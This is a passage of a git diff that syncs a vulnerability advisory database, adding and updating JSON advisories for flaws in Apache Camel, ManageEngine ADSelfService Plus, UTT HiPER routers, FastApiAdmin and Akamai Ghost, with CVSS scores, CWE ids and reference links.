"2026-01-06T00:30:24Z", + "modified": "2026-02-23T09:31:19Z", "published": "2026-01-06T00:30:24Z", "aliases": [ "CVE-2026-0607" @@ -46,6 +46,10 @@ { "type": "WEB", "url": "https://vuldb.com/?submit.731697" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?submit.738707" } ], "database_specific": { diff --git a/advisories/unreviewed/2026/01/GHSA-xvvx-g2mg-wqw5/GHSA-xvvx-g2mg-wqw5.json b/advisories/unreviewed/2026/01/GHSA-xvvx-g2mg-wqw5/GHSA-xvvx-g2mg-wqw5.json index 5a4c3473f43e3..4edbb07ef8cd6 100644 --- a/advisories/unreviewed/2026/01/GHSA-xvvx-g2mg-wqw5/GHSA-xvvx-g2mg-wqw5.json +++ b/advisories/unreviewed/2026/01/GHSA-xvvx-g2mg-wqw5/GHSA-xvvx-g2mg-wqw5.json @@ -1,7 +1,7 @@ { "schema_version": "1.4.0", "id": "GHSA-xvvx-g2mg-wqw5", - "modified": "2026-01-18T09:30:27Z", + "modified": "2026-02-23T09:31:21Z", "published": "2026-01-18T09:30:27Z", "aliases": [ "CVE-2025-15535" @@ -27,6 +27,10 @@ "type": "WEB", "url": "https://github.com/nicbarker/clay/issues/566" }, + { + "type": "WEB", + "url": "https://github.com/nicbarker/clay" + }, { "type": "WEB", "url": "https://github.com/oneafter/1215/blob/main/repro" diff --git a/advisories/unreviewed/2026/02/GHSA-429q-mrc4-38fr/GHSA-429q-mrc4-38fr.json b/advisories/unreviewed/2026/02/GHSA-429q-mrc4-38fr/GHSA-429q-mrc4-38fr.json new file mode 100644 index 0000000000000..74426455a29ad --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-429q-mrc4-38fr/GHSA-429q-mrc4-38fr.json @@ -0,0 +1,35 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-429q-mrc4-38fr", + "modified": "2026-02-23T09:31:23Z", + "published": "2026-02-23T09:31:23Z", + "aliases": [ + "CVE-2026-25747" + ], + "details": "Deserialization of Untrusted Data vulnerability in Apache Camel LevelDB component.\n\nThe Camel-LevelDB DefaultLevelDBSerializer class deserializes data read from the LevelDB aggregation repository using java.io.ObjectInputStream without applying any ObjectInputFilter or class-loading restrictions. An attacker who can write to the LevelDB database files used by a Camel application can inject a crafted serialized Java object that, when deserialized during normal aggregation repository operations, results in arbitrary code execution in the context of the application.\nThis issue affects Apache Camel: from 4.10.0 before 4.10.8, from 4.14.0 before 4.14.5, from 4.15.0 before 4.18.0.\n\nUsers are recommended to upgrade to version 4.18.0, which fixes the issue. For the 4.10.x LTS releases, users are recommended to upgrade to 4.10.9, while for 4.14.x LTS releases, users are recommended to upgrade to 4.14.5", + "severity": [], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-25747" + }, + { + "type": "WEB", + "url": "https://camel.apache.org/security/CVE-2026-25747.html" + }, + { + "type": "WEB", + "url": "https://github.com/oscerd/CVE-2026-25747" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-502" + ], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-23T09:17:01Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-7jmh-rhmc-g5gq/GHSA-7jmh-rhmc-g5gq.json b/advisories/unreviewed/2026/02/GHSA-7jmh-rhmc-g5gq/GHSA-7jmh-rhmc-g5gq.json new file mode 100644 index 0000000000000..fe553a8e375e3 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-7jmh-rhmc-g5gq/GHSA-7jmh-rhmc-g5gq.json @@ -0,0 +1,36 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-7jmh-rhmc-g5gq", + "modified": "2026-02-23T09:31:23Z", + "published": "2026-02-23T09:31:23Z", + "aliases": [ + "CVE-2026-1367" + ], + "details": "Zohocorp ManageEngine ADSelfService Plus versions 6522 and below are vulnerable to authenticated SQL Injection in the search report option.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:L" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-1367" + }, + { + "type": "WEB", + "url": "https://www.manageengine.com/uk/products/self-service-password/advisory/CVE-2026-1367.html" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-89" + ], + "severity": "HIGH", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-23T08:16:13Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-9vfc-93vc-6ffp/GHSA-9vfc-93vc-6ffp.json b/advisories/unreviewed/2026/02/GHSA-9vfc-93vc-6ffp/GHSA-9vfc-93vc-6ffp.json new file mode 100644 index 0000000000000..e63b5ad3a919f --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-9vfc-93vc-6ffp/GHSA-9vfc-93vc-6ffp.json @@ -0,0 +1,56 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-9vfc-93vc-6ffp", + "modified": "2026-02-23T09:31:24Z", + "published": "2026-02-23T09:31:24Z", + "aliases": [ + "CVE-2026-2981" + ], + "details": "A vulnerability was found in UTT HiPER 810G up to 1.7.7-1711. The affected element is the function strcpy of the file /goform/formTaskEdit_ap. The manipulation of the argument txtMin2 results in buffer overflow. The attack may be launched remotely. The exploit has been made public and could be used.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H" + }, + { + "type": "CVSS_V4", + "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-2981" + }, + { + "type": "WEB", + "url": "https://github.com/7wkajk/CVE-VUL/blob/main/5.md" + }, + { + "type": "WEB", + "url": "https://github.com/7wkajk/CVE-VUL/blob/main/5.md#poc" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?ctiid.347365" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?id.347365" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?submit.756131" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-119" + ], + "severity": "HIGH", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-23T09:17:01Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-c3f3-cc42-xr9v/GHSA-c3f3-cc42-xr9v.json b/advisories/unreviewed/2026/02/GHSA-c3f3-cc42-xr9v/GHSA-c3f3-cc42-xr9v.json new file mode 100644 index 0000000000000..93f7774cb35fb --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-c3f3-cc42-xr9v/GHSA-c3f3-cc42-xr9v.json @@ -0,0 +1,35 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-c3f3-cc42-xr9v", + "modified": "2026-02-23T09:31:23Z", + "published": "2026-02-23T09:31:23Z", + "aliases": [ + "CVE-2026-23552" + ], + "details": "Cross-Realm Token Acceptance Bypass in KeycloakSecurityPolicy Apache Camel Keycloak component. \n\nThe Camel-Keycloak KeycloakSecurityPolicy does not validate the iss (issuer) claim of JWT tokens against the configured realm. A token issued by one Keycloak realm is silently accepted by a policy configured for a completely different realm, breaking tenant isolation.\nThis issue affects Apache Camel: from 4.15.0 before 4.18.0.\n\nUsers are recommended to upgrade to version 4.18.0, which fixes the issue.", + "severity": [], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-23552" + }, + { + "type": "WEB", + "url": "https://camel.apache.org/security/CVE-2026-23552.html" + }, + { + "type": "WEB", + "url": "https://github.com/oscerd/CVE-2026-23552" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-346" + ], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-23T09:17:00Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-fhhg-8jv8-7rcw/GHSA-fhhg-8jv8-7rcw.json b/advisories/unreviewed/2026/02/GHSA-fhhg-8jv8-7rcw/GHSA-fhhg-8jv8-7rcw.json new file mode 100644 index 0000000000000..a700e37c1726d --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-fhhg-8jv8-7rcw/GHSA-fhhg-8jv8-7rcw.json @@ -0,0 +1,36 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-fhhg-8jv8-7rcw", + "modified": "2026-02-23T09:31:24Z", + "published": "2026-02-23T09:31:24Z", + "aliases": [ + "CVE-2026-26365" + ], + "details": "Akamai Ghost on Akamai CDN edge servers before 2026-02-06 mishandles processing of custom hop-by-hop HTTP headers, where an incoming request containing the header \"Connection: Transfer-Encoding\" could result in a forward request with invalid message framing, depending on the Akamai processing path. This could result in the origin server parsing the request body incorrectly, leading to HTTP request smuggling.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:C/C:N/I:L/A:N" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-26365" + }, + { + "type": "WEB", + "url": "https://www.akamai.com/blog/security-research/cve-2026-26365-incorrect-processing-connection-transfer-encoding" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-444" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-23T09:17:01Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-h4v7-f6v2-4hmm/GHSA-h4v7-f6v2-4hmm.json b/advisories/unreviewed/2026/02/GHSA-h4v7-f6v2-4hmm/GHSA-h4v7-f6v2-4hmm.json new file mode 100644 index 0000000000000..1cdee802594d1 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-h4v7-f6v2-4hmm/GHSA-h4v7-f6v2-4hmm.json @@ -0,0 +1,52 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-h4v7-f6v2-4hmm", + "modified": "2026-02-23T09:31:23Z", + "published": "2026-02-23T09:31:23Z", + "aliases": [ + "CVE-2026-2975" + ], + "details": "A security flaw has been discovered in FastApiAdmin up to 2.2.0. Affected by this vulnerability is the function reset_api_docs of the file /backend/app/plugin/init_app.py of the component Custom Documentation Endpoint. The manipulation results in information disclosure. The attack may be performed from remote. The exploit has been released to the public and may be used for attacks.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N" + }, + { + "type": "CVSS_V4", + "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:N/VA:N/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-2975" + }, + { + "type": "WEB", + "url": "https://github.com/CC-T-454455/Vulnerabilities/tree/master/fastapi-admin/vulnerability-1" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?ctiid.347359" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?id.347359" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?submit.756067" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-200" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-23T07:16:21Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-m5p7-pf66-25qw/GHSA-m5p7-pf66-25qw.json b/advisories/unreviewed/2026/02/GHSA-m5p7-pf66-25qw/GHSA-m5p7-pf66-25qw.json new file mode 100644 index 0000000000000..c8aec309a81ca --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-m5p7-pf66-25qw/GHSA-m5p7-pf66-25qw.json @@ -0,0 +1,56 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-m5p7-pf66-25qw", + "modified": "2026-02-23T09:31:24Z", + "published": "2026-02-23T09:31:24Z", + "aliases": [ + "CVE-2026-2980" + ], + "details": "A vulnerability has been found in UTT HiPER 810G up to 1.7.7-1711. Impacted is the function strcpy of the file /goform/setSysAdm. The manipulation of the argument passwd1 leads to buffer overflow. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H" + }, + { + "type": "CVSS_V4", + "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:H/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-2980" + }, + { + "type": "WEB", + "url": "https://github.com/7wkajk/CVE-VUL/blob/main/4.md" + }, + { + "type": "WEB", + "url": "https://github.com/7wkajk/CVE-VUL/blob/main/4.md#poc" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?ctiid.347364" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?id.347364" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?submit.756130" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-119" + ], + "severity": "HIGH", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-23T09:17:01Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-m879-6gvr-239v/GHSA-m879-6gvr-239v.json b/advisories/unreviewed/2026/02/GHSA-m879-6gvr-239v/GHSA-m879-6gvr-239v.json new file mode 100644 index 0000000000000..4c877d86dd857 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-m879-6gvr-239v/GHSA-m879-6gvr-239v.json @@ -0,0 +1,52 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-m879-6gvr-239v", + "modified": "2026-02-23T09:31:24Z", + "published": "2026-02-23T09:31:24Z", + "aliases": [ + "CVE-2026-2979" + ], + "details": "A flaw has been found in FastApiAdmin up to 2.2.0. This issue affects the function user_avatar_upload_controller of the file /backend/app/api/v1/module_system/user/controller.py of the component Scheduled Task API. Executing a manipulation can lead to unrestricted upload. The attack can be launched remotely. The exploit has been published and may be used.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L" + }, + { + "type": "CVSS_V4", + "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-2979" + }, + { + "type": "WEB", + "url": "https://github.com/CC-T-454455/Vulnerabilities/tree/master/fastapi-admin/vulnerability-5" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?ctiid.347363" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?id.347363" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?submit.756156" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-284" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-23T09:17:01Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-p2cq-gh8c-83cc/GHSA-p2cq-gh8c-83cc.json b/advisories/unreviewed/2026/02/GHSA-p2cq-gh8c-83cc/GHSA-p2cq-gh8c-83cc.json new file mode 100644 index 0000000000000..8d7d49f9fa66d --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-p2cq-gh8c-83cc/GHSA-p2cq-gh8c-83cc.json @@ -0,0 +1,52 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-p2cq-gh8c-83cc", + "modified": "2026-02-23T09:31:23Z", + "published": "2026-02-23T09:31:23Z", + "aliases": [ + "CVE-2026-2976" + ], + "details": "A weakness has been identified in FastApiAdmin up to 2.2.0. Affected by this issue is the function download_controller of the file /backend/app/api/v1/module_common/file/controller.py of the component Download Endpoint. This manipulation of the argument file_path causes information disclosure. It is possible to initiate the attack remotely. The exploit has been made available to the public and could be used for attacks.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N" + }, + { + "type": "CVSS_V4", + "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:L/VI:N/VA:N/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-2976" + }, + { + "type": "WEB", + "url": "https://github.com/CC-T-454455/Vulnerabilities/tree/master/fastapi-admin/vulnerability-2" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?ctiid.347360" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?id.347360" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?submit.756089" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-200" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-23T07:16:22Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-qmq9-8xrr-rx63/GHSA-qmq9-8xrr-rx63.json b/advisories/unreviewed/2026/02/GHSA-qmq9-8xrr-rx63/GHSA-qmq9-8xrr-rx63.json new file mode 100644 index 0000000000000..dea1054ae757e --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-qmq9-8xrr-rx63/GHSA-qmq9-8xrr-rx63.json @@ -0,0 +1,52 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-qmq9-8xrr-rx63", + "modified": "2026-02-23T09:31:23Z", + "published": "2026-02-23T09:31:23Z", + "aliases": [ + "CVE-2026-2978" + ], + "details": "A vulnerability was detected in FastApiAdmin up to 2.2.0. This vulnerability affects the function upload_file_controller of the file /backend/app/api/v1/module_system/params/controller.py of the component Scheduled Task API. Performing a manipulation results in unrestricted upload. The attack can be initiated remotely. The exploit is now public and may be used.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L" + }, + { + "type": "CVSS_V4", + "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-2978" + }, + { + "type": "WEB", + "url": "https://github.com/CC-T-454455/Vulnerabilities/tree/master/fastapi-admin/vulnerability-4" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?ctiid.347362" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?id.347362" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?submit.756155" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-284" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-23T08:16:13Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-rgpr-47mq-rh3c/GHSA-rgpr-47mq-rh3c.json b/advisories/unreviewed/2026/02/GHSA-rgpr-47mq-rh3c/GHSA-rgpr-47mq-rh3c.json new file mode 100644 index 0000000000000..f80e802f81faa --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-rgpr-47mq-rh3c/GHSA-rgpr-47mq-rh3c.json @@ -0,0 +1,52 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-rgpr-47mq-rh3c", + "modified": "2026-02-23T09:31:23Z", + "published": "2026-02-23T09:31:23Z", + "aliases": [ + "CVE-2026-2977" + ], + "details": "A security vulnerability has been detected in FastApiAdmin up to 2.2.0. This affects the function upload_controller of the file /backend/app/api/v1/module_common/file/controller.py of the component Scheduled Task API. Such manipulation leads to unrestricted upload. It is possible to launch the attack remotely. The exploit has been disclosed publicly and may be used.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L" + }, + { + "type": "CVSS_V4", + "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-2977" + }, + { + "type": "WEB", + "url": "https://github.com/CC-T-454455/Vulnerabilities/tree/master/fastapi-admin/vulnerability-3" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?ctiid.347361" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?id.347361" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?submit.756144" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-284" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-23T08:16:13Z" + } +} \ No newline at end of file From f58705f207371ba42c78dc9d9f2a9cea89e99e01 Mon Sep 17 00:00:00 2001 From: "advisory-database[bot]" <45398580+advisory-database[bot]@users.noreply.github.com> Date: Mon, 23 Feb 2026 12:33:20 +0000 Subject: [PATCH 52/77] Advisory Database Sync --- .../GHSA-v47f-5m37-hhcx.json | 10 +++- .../GHSA-6qxg-cm55-g85x.json | 8 ++- .../GHSA-384m-rpvv-4rw6.json | 6 +- .../GHSA-5943-48f3-6wx5.json | 8 ++- .../GHSA-88qp-7q8w-jhw6.json | 6 +- .../GHSA-vf38-34c2-p6j8.json | 6 +- .../GHSA-28pw-27gw-65v8.json | 6 +- .../GHSA-96w8-fcjx-v927.json | 10 +++- .../GHSA-9hv6-whj4-wpw5.json | 6 +- .../GHSA-c3rr-7229-8p7f.json | 6 +- .../GHSA-f74h-hvpw-9xwm.json | 6 +- .../GHSA-fwqv-682v-f9jf.json | 6 +- .../GHSA-3gmg-r977-hqcc.json | 6 +- .../GHSA-74h7-xgm8-8m8h.json | 6 +- .../GHSA-hqvw-49x7-pm7w.json | 6 +- .../GHSA-hj5f-q3p2-c2h3.json | 6 +- .../GHSA-hjj2-4jq5-9f5q.json | 6 +- .../GHSA-pc6c-whfr-9343.json | 6 +- .../GHSA-3r4h-xx4c-77cj.json | 6 +- .../GHSA-525r-jw95-mh3f.json | 6 +- .../GHSA-x6wm-h4q7-p8hv.json | 6 +- .../GHSA-29mq-c452-8pvf.json | 6 +- .../GHSA-829c-jpvx-vfrv.json | 6 +- .../GHSA-h8c5-64wc-h8mf.json | 6 +- .../GHSA-xcmx-jj38-v524.json | 6 +- .../GHSA-4v8j-92c3-9f2f.json | 6 +- .../GHSA-frg8-29h3-wvgf.json | 6 +- .../GHSA-grx8-c238-5vmr.json | 6 +- .../GHSA-hc69-r6rr-hmxf.json | 6 +- .../GHSA-2846-35pp-gqxq.json | 6 +- .../GHSA-2fpq-m96x-2xgf.json | 6 +- .../GHSA-2ww6-c8hm-gqw6.json | 36 ++++++++++++ .../GHSA-3mqj-x3cm-3wgr.json | 52 +++++++++++++++++ .../GHSA-429q-mrc4-38fr.json | 6 +- .../GHSA-4x58-j42h-46c2.json | 36 ++++++++++++ .../GHSA-c3f3-cc42-xr9v.json | 6 +- .../GHSA-c6rr-xhrp-94pr.json | 1 + .../GHSA-gj3h-r32m-qjhw.json | 1 + .../GHSA-hhvh-4rv2-p55m.json | 34 +++++++++++ .../GHSA-jm4f-crxv-97j5.json | 6 +- .../GHSA-m8cf-3mc4-cgqh.json | 56 +++++++++++++++++++ .../GHSA-qpc6-m6hf-x62g.json | 1 + .../GHSA-vwfg-jcqm-ff7v.json | 6 +- .../GHSA-wcvw-rr7p-mw54.json | 56 +++++++++++++++++++ .../GHSA-xm94-xrhg-42m4.json | 36 ++++++++++++ 45 files changed, 494 insertions(+), 37 deletions(-) create mode 100644 advisories/unreviewed/2026/02/GHSA-2ww6-c8hm-gqw6/GHSA-2ww6-c8hm-gqw6.json create mode 100644 advisories/unreviewed/2026/02/GHSA-3mqj-x3cm-3wgr/GHSA-3mqj-x3cm-3wgr.json create mode 100644 advisories/unreviewed/2026/02/GHSA-4x58-j42h-46c2/GHSA-4x58-j42h-46c2.json create mode 100644 advisories/unreviewed/2026/02/GHSA-hhvh-4rv2-p55m/GHSA-hhvh-4rv2-p55m.json create mode 100644 advisories/unreviewed/2026/02/GHSA-m8cf-3mc4-cgqh/GHSA-m8cf-3mc4-cgqh.json create mode 100644 advisories/unreviewed/2026/02/GHSA-wcvw-rr7p-mw54/GHSA-wcvw-rr7p-mw54.json create mode 100644 advisories/unreviewed/2026/02/GHSA-xm94-xrhg-42m4/GHSA-xm94-xrhg-42m4.json diff --git a/advisories/unreviewed/2022/05/GHSA-v47f-5m37-hhcx/GHSA-v47f-5m37-hhcx.json b/advisories/unreviewed/2022/05/GHSA-v47f-5m37-hhcx/GHSA-v47f-5m37-hhcx.json index 046bc14b353c8..cdb012f95f4c1 100644 --- a/advisories/unreviewed/2022/05/GHSA-v47f-5m37-hhcx/GHSA-v47f-5m37-hhcx.json +++ b/advisories/unreviewed/2022/05/GHSA-v47f-5m37-hhcx/GHSA-v47f-5m37-hhcx.json @@ -1,7 +1,7 @@ { "schema_version": "1.4.0", "id": "GHSA-v47f-5m37-hhcx", - "modified": "2022-05-11T00:01:56Z", + "modified": "2026-02-23T12:31:28Z", "published": "2022-05-03T00:00:36Z", "aliases": [ "CVE-2021-41810" @@ -19,6 +19,14 @@ "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2021-41810" }, + { + "type": "WEB", + "url": "https://empower.m-files.com/security-advisories/CVE-2021-41810" + }, + { + "type": "WEB", + "url": "https://product.m-files.com/security-advisories/cve-2021-41810" + }, { "type": "WEB", "url": "https://www.m-files.com/about/trust-center/security-advisories/cve-2021-41810" diff --git a/advisories/unreviewed/2023/12/GHSA-6qxg-cm55-g85x/GHSA-6qxg-cm55-g85x.json b/advisories/unreviewed/2023/12/GHSA-6qxg-cm55-g85x/GHSA-6qxg-cm55-g85x.json index a4ed36a15fa32..6cd37d7c4678a 100644 --- a/advisories/unreviewed/2023/12/GHSA-6qxg-cm55-g85x/GHSA-6qxg-cm55-g85x.json +++ b/advisories/unreviewed/2023/12/GHSA-6qxg-cm55-g85x/GHSA-6qxg-cm55-g85x.json @@ -1,12 +1,12 @@ { "schema_version": "1.4.0", "id": "GHSA-6qxg-cm55-g85x", - "modified": "2024-08-28T09:30:33Z", + "modified": "2026-02-23T12:31:28Z", "published": "2023-12-20T12:30:26Z", "aliases": [ "CVE-2023-6912" ], - "details": "Lack of protection against brute force attacks in M-Files Server before 23.12.13205.0 allows an attacker unlimited authentication attempts, potentially compromising targeted M-Files user accounts by guessing passwords.\n", + "details": "Lack of protection against brute force attacks in M-Files Server before 23.12.13205.0 allows an attacker unlimited authentication attempts, potentially compromising targeted M-Files user accounts by guessing passwords.", "severity": [ { "type": "CVSS_V3", @@ -19,6 +19,10 @@ "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-6912" }, + { + "type": "WEB", + "url": "https://empower.m-files.com/security-advisories/CVE-2023-6912" + }, { "type": "WEB", "url": "https://product.m-files.com/security-advisories/cve-2023-6912" diff --git a/advisories/unreviewed/2024/02/GHSA-384m-rpvv-4rw6/GHSA-384m-rpvv-4rw6.json b/advisories/unreviewed/2024/02/GHSA-384m-rpvv-4rw6/GHSA-384m-rpvv-4rw6.json index 8118c7d6150c5..df2a146eb54ea 100644 --- a/advisories/unreviewed/2024/02/GHSA-384m-rpvv-4rw6/GHSA-384m-rpvv-4rw6.json +++ b/advisories/unreviewed/2024/02/GHSA-384m-rpvv-4rw6/GHSA-384m-rpvv-4rw6.json @@ -1,7 +1,7 @@ { "schema_version": "1.4.0", "id": "GHSA-384m-rpvv-4rw6", - "modified": "2025-12-23T21:30:15Z", + "modified": "2026-02-23T12:31:28Z", "published": "2024-02-23T09:30:38Z", "aliases": [ "CVE-2024-0563" @@ -19,6 +19,10 @@ "type": "ADVISORY", "url": 